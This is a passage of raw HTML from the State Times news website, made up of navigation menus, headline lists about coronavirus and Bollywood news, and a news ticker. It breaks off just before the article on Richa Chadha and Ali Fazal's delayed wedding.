href='http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/' title='Teaching staff of Udhampur, Rajouri allowed remaining off duty'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364' alt='Teaching staff of Udhampur, Rajouri allowed remaining off duty' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/' title='Teaching staff of Udhampur, Rajouri allowed remaining off duty'> Teaching staff of Udhampur, Rajouri allowed remaining off duty</a><span> - 10 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/substandard-sanitisers-worth-rs-25-lakh-seized-in-mumbai/' title='Substandard sanitisers worth Rs 25 lakh seized in Mumbai'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/sanitizers.jpg&h=60&w=90' alt='Substandard sanitisers worth Rs 25 lakh seized in Mumbai' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/substandard-sanitisers-worth-rs-25-lakh-seized-in-mumbai/' title='Substandard sanitisers worth Rs 25 lakh seized in Mumbai'> Substandard sanitisers worth Rs 25 lakh seized in Mumbai</a><span> - 30 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/30-shanties-gutted-in-fire-in-pune-slum-none-hurt/' title='30 shanties gutted in fire in Pune slum, none hurt'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2019/06/Fire-2.jpg&h=60&w=90' alt='30 shanties gutted in fire in Pune slum, none hurt' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/30-shanties-gutted-in-fire-in-pune-slum-none-hurt/' title='30 shanties gutted in fire in Pune slum, none hurt'> 30 shanties gutted in fire in Pune slum, none hurt</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/goair-to-continue-operations-in-mizoram-say-officials/' title='GoAir to continue operations in Mizoram, say officials'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2016/08/GoAir-to-hire-500-personnel-expand-fleet-to-26-planes.jpg&h=60&w=90' alt='GoAir to continue operations in Mizoram, say officials' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/goair-to-continue-operations-in-mizoram-say-officials/' title='GoAir to continue operations in Mizoram, say officials'> GoAir to continue operations in Mizoram, say officials</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/second-coronavirus-case-reported-in-ap/' title='Second coronavirus case reported in AP'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Coronavirus-1.jpg&h=60&w=90' alt='Second coronavirus case reported in AP' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/second-coronavirus-case-reported-in-ap/' title='Second coronavirus case reported in AP'> Second coronavirus case reported in AP</a><span> - 1 hour ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/' title='Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20117%2074'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&h=76&w=120' alt='Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/' title='Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare'> Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare</a><span>  29 seconds ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/amitabh-bachchan-cancels-sunday-meet-amid-coronavirus-outbreak/' title='Amitabh Bachchan cancels Sunday meet amid coronavirus outbreak'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20117%2074'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2017/03/Amitabh-Bachchan-bats-for-gender-equality.jpg&h=76&w=120' alt='Amitabh Bachchan cancels Sunday meet amid coronavirus outbreak' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/amitabh-bachchan-cancels-sunday-meet-amid-coronavirus-outbreak/' title='Amitabh Bachchan cancels Sunday meet amid coronavirus outbreak'> Amitabh Bachchan cancels Sunday meet amid coronavirus outbreak</a><span>  4 days ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/important-for-films-like-ghar-ki-murgi-panga-to-connect-more-with-male-audience-nitesh/' title='Important for films like &#8216;Ghar Ki Murgi&#8217;, &#8216;Panga&#8217; to connect more with male audience: Nitesh'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20117%2074'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/nitish-tiwari.jpg&h=76&w=120' alt='Important for films like &#8216;Ghar Ki Murgi&#8217;, &#8216;Panga&#8217; to connect more with male audience: Nitesh' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/important-for-films-like-ghar-ki-murgi-panga-to-connect-more-with-male-audience-nitesh/' title='Important for films like &#8216;Ghar Ki Murgi&#8217;, &#8216;Panga&#8217; to connect more with male audience: Nitesh'> Important for films like &#8216;Ghar Ki Murgi&#8217;, &#8216;Panga&#8217; to connect more with male audience: Nitesh</a><span>  1 week ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2016%2016'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x28364" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/we-are-all-in-this-together-finch-on-possible-financial-losses-due-to-covid-19/">We are all in this together: Finch on possible financial losses due to COVID-19</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/">Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/icse-board-class-1012-exams-postponed-till-march-31/">ICSE board class 10,12 exams postponed till March 31</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/china-reports-no-new-domestic-coronavirus-cases-for-first-time/">China reports no new domestic coronavirus cases for first time</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/will-ensure-safe-return-of-50-students-from-singapore-samant/">Will ensure safe return of 50 students from Singapore: Samant</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/substandard-sanitisers-worth-rs-25-lakh-seized-in-mumbai/">Substandard sanitisers worth Rs 25 lakh seized in Mumbai</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/30-shanties-gutted-in-fire-in-pune-slum-none-hurt/">30 shanties gutted in fire in Pune slum, none hurt</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/goair-to-continue-operations-in-mizoram-say-officials/">GoAir to continue operations in Mizoram, say officials</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/second-coronavirus-case-reported-in-ap/">Second coronavirus case reported in AP</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/covid-19-after-one-person-has-been-detected-positive-in-khanyar-authorities-imposed-restrictions-in-srinagar/">COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jk-being-presented-quite-different-from-ground-reality-nc/">J&#038;K being presented quite  different from ground reality: NC</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/govt-gave-internet-access-to-journalists-banks-during-kashmir-shutdown-dhotre/">Govt gave internet access to journalists, banks during Kashmir shutdown: Dhotre</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/dr-syed-abid-rashid-shah-assumes-charge-as-ceo-jk-era-jtfrp/">Dr Syed Abid Rashid Shah assumes charge as CEO, J&#038;K ERA/JTFRP</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jk-residents-to-have-rs-5-lakh-free-health-insurance-like-ayushman-bharat/">J&#038;K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/">Teaching staff of Udhampur, Rajouri allowed remaining off duty</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/entertainment/" title="Entertainment"><span itemprop="title">Entertainment</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/entertainment/bollywod/" title="Bollywood"><span itemprop="title">Bollywood</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-595821 post type-post status-publish format-standard category-bollywod category-entertainment category-imp-today"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
